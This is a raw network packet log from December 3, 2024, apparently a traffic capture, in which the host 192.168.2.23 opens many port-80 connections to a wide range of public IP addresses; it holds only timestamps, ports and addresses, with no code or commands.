                                                Dec 3, 2024 22:16:49.484734058 CET8053878219.159.129.91192.168.2.23
                                                Dec 3, 2024 22:16:49.484746933 CET803553444.223.88.222192.168.2.23
                                                Dec 3, 2024 22:16:49.484756947 CET8051966115.64.13.91192.168.2.23
                                                Dec 3, 2024 22:16:49.484766006 CET805199244.100.34.190192.168.2.23
                                                Dec 3, 2024 22:16:49.484792948 CET804619659.87.238.43192.168.2.23
                                                Dec 3, 2024 22:16:49.484824896 CET8042740126.110.141.44192.168.2.23
                                                Dec 3, 2024 22:16:49.484836102 CET8050606106.119.111.49192.168.2.23
                                                Dec 3, 2024 22:16:49.484853029 CET8036024161.83.220.85192.168.2.23
                                                Dec 3, 2024 22:16:49.484951019 CET5387880192.168.2.23219.159.129.91
                                                Dec 3, 2024 22:16:49.484950066 CET3553480192.168.2.2344.223.88.222
                                                Dec 3, 2024 22:16:49.484961033 CET5196680192.168.2.23115.64.13.91
                                                Dec 3, 2024 22:16:49.484961033 CET4619680192.168.2.2359.87.238.43
                                                Dec 3, 2024 22:16:49.484972954 CET4274080192.168.2.23126.110.141.44
                                                Dec 3, 2024 22:16:49.484975100 CET3602480192.168.2.23161.83.220.85
                                                Dec 3, 2024 22:16:49.484978914 CET5060680192.168.2.23106.119.111.49
                                                Dec 3, 2024 22:16:49.485085011 CET3770780192.168.2.23111.131.4.87
                                                Dec 3, 2024 22:16:49.485100031 CET3770780192.168.2.23146.239.100.84
                                                Dec 3, 2024 22:16:49.485105991 CET5199280192.168.2.2344.100.34.190
                                                Dec 3, 2024 22:16:49.485107899 CET3770780192.168.2.23186.44.230.51
                                                Dec 3, 2024 22:16:49.485105991 CET3770780192.168.2.2397.5.239.244
                                                Dec 3, 2024 22:16:49.485107899 CET3770780192.168.2.2313.83.156.147
                                                Dec 3, 2024 22:16:49.485107899 CET3770780192.168.2.2388.127.16.255
                                                Dec 3, 2024 22:16:49.485111952 CET3770780192.168.2.23155.207.215.11
                                                Dec 3, 2024 22:16:49.485119104 CET3770780192.168.2.2373.123.193.39
                                                Dec 3, 2024 22:16:49.485120058 CET3770780192.168.2.23193.207.49.15
                                                Dec 3, 2024 22:16:49.485120058 CET3770780192.168.2.23164.212.48.222
                                                Dec 3, 2024 22:16:49.485120058 CET3770780192.168.2.2331.21.10.255
                                                Dec 3, 2024 22:16:49.485125065 CET3770780192.168.2.23138.163.199.67
                                                Dec 3, 2024 22:16:49.485130072 CET3770780192.168.2.2368.62.252.103
                                                Dec 3, 2024 22:16:49.485131979 CET3770780192.168.2.23173.223.172.112
                                                Dec 3, 2024 22:16:49.485131979 CET3770780192.168.2.23211.8.89.147
                                                Dec 3, 2024 22:16:49.485131979 CET3770780192.168.2.23167.33.8.199
                                                Dec 3, 2024 22:16:49.485132933 CET3770780192.168.2.23149.13.139.102
                                                Dec 3, 2024 22:16:49.485136032 CET3770780192.168.2.2334.79.83.197
                                                Dec 3, 2024 22:16:49.485142946 CET3770780192.168.2.23141.112.175.134
                                                Dec 3, 2024 22:16:49.485143900 CET3770780192.168.2.23102.241.240.222
                                                Dec 3, 2024 22:16:49.485142946 CET3770780192.168.2.2360.123.146.24
                                                Dec 3, 2024 22:16:49.485146046 CET3770780192.168.2.23181.145.100.167
                                                Dec 3, 2024 22:16:49.485146999 CET3770780192.168.2.23121.146.65.42
                                                Dec 3, 2024 22:16:49.485146999 CET3770780192.168.2.23140.55.161.48
                                                Dec 3, 2024 22:16:49.485150099 CET3770780192.168.2.2386.109.95.139
                                                Dec 3, 2024 22:16:49.485151052 CET3770780192.168.2.23112.167.4.132
                                                Dec 3, 2024 22:16:49.485151052 CET3770780192.168.2.23116.74.92.49
                                                Dec 3, 2024 22:16:49.485161066 CET3770780192.168.2.23196.11.126.229
                                                Dec 3, 2024 22:16:49.485162973 CET3770780192.168.2.2318.15.129.129
                                                Dec 3, 2024 22:16:49.485162973 CET3770780192.168.2.23115.16.14.245
                                                Dec 3, 2024 22:16:49.485162973 CET3770780192.168.2.2351.177.181.108
                                                Dec 3, 2024 22:16:49.485165119 CET3770780192.168.2.2376.183.150.145
                                                Dec 3, 2024 22:16:49.485162020 CET3770780192.168.2.23184.3.0.176
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.23177.194.53.95
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.23133.42.221.143
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.2325.249.70.255
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.23167.4.81.179
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.2313.142.31.105
                                                Dec 3, 2024 22:16:49.485171080 CET3770780192.168.2.2391.62.37.224
                                                Dec 3, 2024 22:16:49.485173941 CET3770780192.168.2.2383.60.97.169
                                                Dec 3, 2024 22:16:49.485173941 CET3770780192.168.2.23184.150.13.219
                                                Dec 3, 2024 22:16:49.485176086 CET3770780192.168.2.2386.153.139.208
                                                Dec 3, 2024 22:16:49.485183001 CET3770780192.168.2.2358.105.114.64
                                                Dec 3, 2024 22:16:49.485186100 CET3770780192.168.2.23116.123.154.187
                                                Dec 3, 2024 22:16:49.485203028 CET3770780192.168.2.23210.33.197.23
                                                Dec 3, 2024 22:16:49.485204935 CET3770780192.168.2.23104.25.42.111
                                                Dec 3, 2024 22:16:49.485205889 CET3770780192.168.2.2313.107.130.118
                                                Dec 3, 2024 22:16:49.485205889 CET3770780192.168.2.23210.232.140.111
                                                Dec 3, 2024 22:16:49.485205889 CET3770780192.168.2.2379.86.124.113
                                                Dec 3, 2024 22:16:49.485210896 CET3770780192.168.2.23204.252.249.52
                                                Dec 3, 2024 22:16:49.485210896 CET3770780192.168.2.234.191.213.202
                                                Dec 3, 2024 22:16:49.485213041 CET3770780192.168.2.23207.48.59.78
                                                Dec 3, 2024 22:16:49.485210896 CET3770780192.168.2.23208.222.90.74
                                                Dec 3, 2024 22:16:49.485213041 CET3770780192.168.2.2398.177.25.184
                                                Dec 3, 2024 22:16:49.485215902 CET3770780192.168.2.23124.53.178.255
                                                Dec 3, 2024 22:16:49.485215902 CET3770780192.168.2.23219.168.167.10
                                                Dec 3, 2024 22:16:49.485276937 CET3770780192.168.2.2396.65.233.187
                                                Dec 3, 2024 22:16:49.485276937 CET3770780192.168.2.23196.169.49.153
                                                Dec 3, 2024 22:16:49.485280991 CET3770780192.168.2.23150.8.35.209
                                                Dec 3, 2024 22:16:49.485280991 CET3770780192.168.2.23100.18.42.22
                                                Dec 3, 2024 22:16:49.485281944 CET3770780192.168.2.23176.228.205.234
                                                Dec 3, 2024 22:16:49.485281944 CET3770780192.168.2.23173.238.74.110
                                                Dec 3, 2024 22:16:49.485282898 CET3770780192.168.2.23210.119.171.166
                                                Dec 3, 2024 22:16:49.485282898 CET3770780192.168.2.23192.157.22.89
                                                Dec 3, 2024 22:16:49.485282898 CET3770780192.168.2.2312.216.64.57
                                                Dec 3, 2024 22:16:49.485285044 CET3770780192.168.2.23181.184.137.117
                                                Dec 3, 2024 22:16:49.485285044 CET3770780192.168.2.23146.65.241.123
                                                Dec 3, 2024 22:16:49.485282898 CET3770780192.168.2.23139.213.215.78
                                                Dec 3, 2024 22:16:49.485285044 CET3770780192.168.2.23110.12.74.212
                                                Dec 3, 2024 22:16:49.485282898 CET3770780192.168.2.23148.180.106.84
                                                Dec 3, 2024 22:16:49.485285044 CET3770780192.168.2.2348.184.164.56
                                                Dec 3, 2024 22:16:49.485321045 CET3770780192.168.2.23170.20.226.246
                                                Dec 3, 2024 22:16:49.485325098 CET3770780192.168.2.2349.168.120.139
                                                Dec 3, 2024 22:16:49.485325098 CET3770780192.168.2.2376.101.0.19
                                                Dec 3, 2024 22:16:49.485325098 CET3770780192.168.2.23172.184.148.201
                                                Dec 3, 2024 22:16:49.485327959 CET3770780192.168.2.23203.225.231.208
                                                Dec 3, 2024 22:16:49.485327959 CET3770780192.168.2.23162.206.41.62
                                                Dec 3, 2024 22:16:49.485327959 CET3770780192.168.2.23107.97.197.253
                                                Dec 3, 2024 22:16:49.485327959 CET3770780192.168.2.23149.31.86.75
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23219.193.66.179
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.2395.221.2.218
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23200.68.242.62
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23208.103.188.70
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.2380.156.104.5
                                                Dec 3, 2024 22:16:49.485335112 CET3770780192.168.2.23174.96.165.73
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23143.39.236.123
                                                Dec 3, 2024 22:16:49.485335112 CET3770780192.168.2.23180.119.70.53
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23199.154.139.31
                                                Dec 3, 2024 22:16:49.485335112 CET3770780192.168.2.23132.176.131.200
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23181.197.241.223
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.2324.239.191.209
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23124.70.217.109
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.235.214.87.85
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23112.136.18.135
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.2365.155.227.86
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23201.253.11.154
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23174.146.168.92
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23222.40.63.238
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.2378.99.40.170
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.23209.16.190.121
                                                Dec 3, 2024 22:16:49.485335112 CET3770780192.168.2.239.92.110.213
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.23108.88.123.174
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.239.118.75.53
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23179.15.34.251
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.23164.32.187.35
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.23111.150.178.145
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23157.171.205.219
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.23186.200.83.110
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.2392.93.144.140
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.238.234.225.193
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.23139.59.176.198
                                                Dec 3, 2024 22:16:49.485335112 CET3770780192.168.2.2361.42.165.168
                                                Dec 3, 2024 22:16:49.485331059 CET3770780192.168.2.23146.137.155.186
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.2349.113.59.47
                                                Dec 3, 2024 22:16:49.485364914 CET3770780192.168.2.23126.228.80.175
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23156.250.205.147
                                                Dec 3, 2024 22:16:49.485364914 CET3770780192.168.2.23211.224.33.238
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.23191.90.50.122
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.2359.204.236.195
                                                Dec 3, 2024 22:16:49.485364914 CET3770780192.168.2.23145.84.1.63
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.23133.81.204.179
                                                Dec 3, 2024 22:16:49.485337019 CET3770780192.168.2.2379.29.206.46
                                                Dec 3, 2024 22:16:49.485364914 CET3770780192.168.2.2371.153.205.49
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23221.249.189.16
                                                Dec 3, 2024 22:16:49.485373974 CET3770780192.168.2.23198.217.153.44
                                                Dec 3, 2024 22:16:49.485333920 CET3770780192.168.2.2327.166.11.73
                                                Dec 3, 2024 22:16:49.485336065 CET3770780192.168.2.23121.43.213.254
                                                Dec 3, 2024 22:16:49.485373974 CET3770780192.168.2.23203.223.114.36
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.23142.231.25.138
                                                Dec 3, 2024 22:16:49.485373974 CET3770780192.168.2.2358.71.64.230
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.2381.230.77.55
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.2343.207.59.18
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.23156.253.216.84
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.23177.213.119.192
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.23118.169.102.126
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.23218.77.142.139
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.23141.143.119.27
                                                Dec 3, 2024 22:16:49.485368967 CET3770780192.168.2.23201.231.239.163
                                                Dec 3, 2024 22:16:49.485373974 CET3770780192.168.2.23195.17.135.163
                                                Dec 3, 2024 22:16:49.485373974 CET3770780192.168.2.2352.218.127.83
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.23152.16.159.128
                                                Dec 3, 2024 22:16:49.485371113 CET3770780192.168.2.2392.63.18.76
                                                Dec 3, 2024 22:16:49.485383987 CET3770780192.168.2.2374.2.136.252
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.23129.144.149.120
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.2346.144.117.150
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.23185.103.36.43
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.23165.97.211.250
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.23188.158.142.139
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.23105.111.46.131
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.2368.170.92.57
                                                Dec 3, 2024 22:16:49.485385895 CET3770780192.168.2.232.6.168.142
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.23117.101.48.75
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.2317.93.206.171
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.23107.211.108.107
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.2340.187.37.109
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.2323.190.203.48
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23122.232.156.179
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.23173.73.71.218
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.231.85.146.172
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.2348.201.175.233
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23151.173.8.142
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.23159.40.223.11
                                                Dec 3, 2024 22:16:49.485388994 CET3770780192.168.2.23173.238.234.91
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2377.213.74.77
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.23165.204.203.47
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.23114.143.136.83
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2392.166.172.97
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.2313.14.18.38
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2367.148.218.44
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.2338.199.145.109
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.23203.224.171.79
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23103.225.249.100
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2334.175.132.49
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.23204.69.86.252
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.231.197.145.21
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.23163.196.67.150
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2346.167.95.129
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.2340.193.197.214
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23189.132.99.201
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.23223.187.18.160
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.23105.60.114.161
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.235.191.135.102
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.23155.182.123.186
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.23142.60.83.92
                                                Dec 3, 2024 22:16:49.485413074 CET3770780192.168.2.23218.195.95.70
                                                Dec 3, 2024 22:16:49.485394001 CET3770780192.168.2.2382.20.232.137
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23121.29.248.35
                                                Dec 3, 2024 22:16:49.485414028 CET3770780192.168.2.23212.118.155.248
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.2359.88.131.166
                                                Dec 3, 2024 22:16:49.485413074 CET3770780192.168.2.2392.199.219.62
                                                Dec 3, 2024 22:16:49.485414028 CET3770780192.168.2.2374.127.89.23
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.2397.99.243.131
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.2364.27.1.220
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.2360.90.200.187
                                                Dec 3, 2024 22:16:49.485414028 CET3770780192.168.2.2318.117.227.200
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23151.118.213.182
                                                Dec 3, 2024 22:16:49.485394955 CET3770780192.168.2.23126.242.193.0
                                                Dec 3, 2024 22:16:49.485413074 CET3770780192.168.2.238.130.118.150
                                                Dec 3, 2024 22:16:49.485390902 CET3770780192.168.2.23193.42.221.135
                                                Dec 3, 2024 22:16:49.485430002 CET3770780192.168.2.23205.212.181.238
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.2399.95.74.162
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.23130.80.252.238
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.23141.64.164.51
                                                Dec 3, 2024 22:16:49.485405922 CET3770780192.168.2.2345.205.190.59
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.2390.156.130.182
                                                Dec 3, 2024 22:16:49.485434055 CET3770780192.168.2.23129.207.35.11
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.23145.221.145.190
                                                Dec 3, 2024 22:16:49.485433102 CET3770780192.168.2.23168.28.37.12
                                                Dec 3, 2024 22:16:49.485425949 CET3770780192.168.2.23197.239.126.219
                                                Dec 3, 2024 22:16:49.485433102 CET3770780192.168.2.2384.192.233.21
                                                Dec 3, 2024 22:16:49.485438108 CET3770780192.168.2.23186.11.158.108
                                                Dec 3, 2024 22:16:49.485433102 CET3770780192.168.2.2319.72.217.212
                                                Dec 3, 2024 22:16:49.485438108 CET3770780192.168.2.2398.85.80.11
                                                Dec 3, 2024 22:16:49.485434055 CET3770780192.168.2.23209.246.188.125
                                                Dec 3, 2024 22:16:49.485438108 CET3770780192.168.2.23164.165.95.109
                                                Dec 3, 2024 22:16:49.485436916 CET3770780192.168.2.23216.115.55.232
                                                Dec 3, 2024 22:16:49.485436916 CET3770780192.168.2.23153.228.46.33
                                                Dec 3, 2024 22:16:49.485436916 CET3770780192.168.2.23183.163.255.76
                                                Dec 3, 2024 22:16:49.485436916 CET3770780192.168.2.23217.20.60.132
                                                Dec 3, 2024 22:16:49.485436916 CET3770780192.168.2.238.183.79.125
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.2371.166.200.50
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.2317.133.94.34
                                                Dec 3, 2024 22:16:49.485434055 CET3770780192.168.2.2317.151.121.55
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.2350.179.211.193
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.23220.164.205.65
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.23184.198.71.188
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.2343.24.149.28
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.23156.59.20.204
                                                Dec 3, 2024 22:16:49.485444069 CET3770780192.168.2.23114.29.0.185
                                                Dec 3, 2024 22:16:49.485446930 CET3770780192.168.2.23150.71.115.18
                                                Dec 3, 2024 22:16:49.485446930 CET3770780192.168.2.23205.51.220.215
                                                Dec 3, 2024 22:16:49.485446930 CET3770780192.168.2.2359.106.112.57
                                                Dec 3, 2024 22:16:49.485449076 CET3770780192.168.2.2323.121.209.8
                                                Dec 3, 2024 22:16:49.485449076 CET3770780192.168.2.23168.226.133.86
                                                Dec 3, 2024 22:16:49.485449076 CET3770780192.168.2.23170.146.208.228
                                                Dec 3, 2024 22:16:49.485450029 CET3770780192.168.2.23174.70.168.28
                                                Dec 3, 2024 22:16:49.485449076 CET3770780192.168.2.23125.240.207.25
                                                Dec 3, 2024 22:16:49.485451937 CET3770780192.168.2.23160.48.228.248
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.23222.153.106.65
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.232.115.45.137
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.23177.114.102.33
                                                Dec 3, 2024 22:16:49.485455990 CET3770780192.168.2.23204.123.233.83
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.23137.39.1.128
                                                Dec 3, 2024 22:16:49.485455990 CET3770780192.168.2.23108.43.177.120
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.2362.99.139.85
                                                Dec 3, 2024 22:16:49.485455990 CET3770780192.168.2.231.89.248.5
                                                Dec 3, 2024 22:16:49.485455036 CET3770780192.168.2.23102.72.195.82
                                                Dec 3, 2024 22:16:49.485455990 CET3770780192.168.2.2327.122.59.26
                                                Dec 3, 2024 22:16:49.485464096 CET3770780192.168.2.2392.227.56.82
                                                Dec 3, 2024 22:16:49.485464096 CET3770780192.168.2.2383.2.46.189
                                                Dec 3, 2024 22:16:49.485466957 CET3770780192.168.2.235.3.42.229
                                                Dec 3, 2024 22:16:49.485466957 CET3770780192.168.2.23119.37.128.21
                                                Dec 3, 2024 22:16:49.485466957 CET3770780192.168.2.239.222.28.80
                                                Dec 3, 2024 22:16:49.485467911 CET3770780192.168.2.2332.153.251.188
                                                Dec 3, 2024 22:16:49.485466957 CET3770780192.168.2.23161.157.200.237
                                                Dec 3, 2024 22:16:49.485467911 CET3770780192.168.2.23166.212.107.174
                                                Dec 3, 2024 22:16:49.485466957 CET3770780192.168.2.23165.6.231.140
                                                Dec 3, 2024 22:16:49.485471010 CET3770780192.168.2.23124.168.58.69
                                                Dec 3, 2024 22:16:49.485471010 CET3770780192.168.2.23147.244.22.50
                                                Dec 3, 2024 22:16:49.485471010 CET3770780192.168.2.23146.191.180.138
                                                Dec 3, 2024 22:16:49.485471010 CET3770780192.168.2.2345.46.168.102
                                                Dec 3, 2024 22:16:49.485477924 CET3770780192.168.2.2382.159.202.195
                                                Dec 3, 2024 22:16:49.485477924 CET3770780192.168.2.23210.227.95.80
                                                Dec 3, 2024 22:16:49.485480070 CET3770780192.168.2.2362.171.191.227
                                                Dec 3, 2024 22:16:49.485480070 CET3770780192.168.2.2392.236.89.105
                                                Dec 3, 2024 22:16:49.485481024 CET3770780192.168.2.2373.107.211.250
                                                Dec 3, 2024 22:16:49.485480070 CET3770780192.168.2.2399.238.143.69
                                                Dec 3, 2024 22:16:49.485481024 CET3770780192.168.2.23114.254.36.46
                                                Dec 3, 2024 22:16:49.485483885 CET3770780192.168.2.23171.149.173.61
                                                Dec 3, 2024 22:16:49.485482931 CET3770780192.168.2.23202.254.68.152
                                                Dec 3, 2024 22:16:49.485496998 CET3770780192.168.2.23168.73.113.190
                                                Dec 3, 2024 22:16:49.485496998 CET3770780192.168.2.2363.188.27.78
                                                Dec 3, 2024 22:16:49.485501051 CET3770780192.168.2.23148.159.65.37
                                                Dec 3, 2024 22:16:49.485501051 CET3770780192.168.2.23171.40.44.34
                                                Dec 3, 2024 22:16:49.485501051 CET3770780192.168.2.23128.173.123.122
                                                Dec 3, 2024 22:16:49.485501051 CET3770780192.168.2.2397.185.57.215
                                                Dec 3, 2024 22:16:49.485501051 CET3770780192.168.2.2319.60.209.58
                                                Dec 3, 2024 22:16:49.485506058 CET3770780192.168.2.23109.156.139.164
                                                Dec 3, 2024 22:16:49.485506058 CET3770780192.168.2.2351.75.64.28
                                                Dec 3, 2024 22:16:49.485507965 CET3770780192.168.2.2334.227.173.221
                                                Dec 3, 2024 22:16:49.485507965 CET3770780192.168.2.2382.11.160.97
                                                Dec 3, 2024 22:16:49.485507965 CET3770780192.168.2.23122.195.10.137
                                                Dec 3, 2024 22:16:49.485511065 CET3770780192.168.2.2346.29.54.76
                                                Dec 3, 2024 22:16:49.485511065 CET3770780192.168.2.23220.25.176.54
                                                Dec 3, 2024 22:16:49.485511065 CET3770780192.168.2.2384.179.55.162
                                                Dec 3, 2024 22:16:49.485511065 CET3770780192.168.2.23175.25.126.10
                                                Dec 3, 2024 22:16:49.485523939 CET3770780192.168.2.2313.12.188.87
                                                Dec 3, 2024 22:16:49.485533953 CET3770780192.168.2.2374.61.157.37
                                                Dec 3, 2024 22:16:49.485533953 CET3770780192.168.2.2341.14.37.64
                                                Dec 3, 2024 22:16:49.485538960 CET3770780192.168.2.23129.167.180.40
                                                Dec 3, 2024 22:16:49.485538960 CET3770780192.168.2.2349.147.78.84
                                                Dec 3, 2024 22:16:49.485539913 CET3770780192.168.2.23122.36.250.13
                                                Dec 3, 2024 22:16:49.485538960 CET3770780192.168.2.2312.159.133.168
                                                Dec 3, 2024 22:16:49.485539913 CET3770780192.168.2.23118.142.99.183
                                                Dec 3, 2024 22:16:49.485539913 CET3770780192.168.2.23210.62.166.187
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.23118.133.253.184
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.23130.126.142.93
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.2387.196.165.22
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.2361.95.176.215
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.23149.16.62.106
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.23124.80.132.240
                                                Dec 3, 2024 22:16:49.485542059 CET3770780192.168.2.2361.106.117.162
                                                Dec 3, 2024 22:16:49.485539913 CET3770780192.168.2.23219.220.255.175
                                                Dec 3, 2024 22:16:49.485543966 CET3770780192.168.2.23161.196.4.35
                                                Dec 3, 2024 22:16:49.485539913 CET3770780192.168.2.23136.241.139.26
                                                Dec 3, 2024 22:16:49.485543966 CET3770780192.168.2.23130.179.124.215
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.23145.199.108.24
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.23197.129.22.119
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.23131.122.190.142
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.23158.181.116.224
                                                Dec 3, 2024 22:16:49.485548973 CET3770780192.168.2.23201.154.87.16
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.2349.208.240.6
                                                Dec 3, 2024 22:16:49.485548973 CET3770780192.168.2.2358.81.212.70
                                                Dec 3, 2024 22:16:49.485548973 CET3770780192.168.2.23193.161.1.44
                                                Dec 3, 2024 22:16:49.485549927 CET3770780192.168.2.23194.32.225.129
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.2362.107.229.25
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.23143.58.86.70
                                                Dec 3, 2024 22:16:49.485548019 CET3770780192.168.2.2377.111.98.126
                                                Dec 3, 2024 22:16:49.485559940 CET3770780192.168.2.2347.3.251.231
                                                Dec 3, 2024 22:16:49.485563040 CET3770780192.168.2.23220.57.99.111
                                                Dec 3, 2024 22:16:49.485599041 CET3553480192.168.2.2344.223.88.222
                                                Dec 3, 2024 22:16:49.485599041 CET3553480192.168.2.2344.223.88.222
                                                Dec 3, 2024 22:16:49.486044884 CET3590280192.168.2.2344.223.88.222
                                                Dec 3, 2024 22:16:49.486377001 CET5387880192.168.2.23219.159.129.91
                                                Dec 3, 2024 22:16:49.486377001 CET5387880192.168.2.23219.159.129.91
                                                Dec 3, 2024 22:16:49.486620903 CET5424680192.168.2.23219.159.129.91
                                                Dec 3, 2024 22:16:49.486924887 CET4274080192.168.2.23126.110.141.44
                                                Dec 3, 2024 22:16:49.486924887 CET4274080192.168.2.23126.110.141.44
                                                Dec 3, 2024 22:16:49.487184048 CET4310880192.168.2.23126.110.141.44
                                                Dec 3, 2024 22:16:49.487567902 CET5199280192.168.2.2344.100.34.190
                                                Dec 3, 2024 22:16:49.487567902 CET5199280192.168.2.2344.100.34.190
                                                Dec 3, 2024 22:16:49.487812042 CET5236080192.168.2.2344.100.34.190
                                                Dec 3, 2024 22:16:49.488245010 CET5060680192.168.2.23106.119.111.49
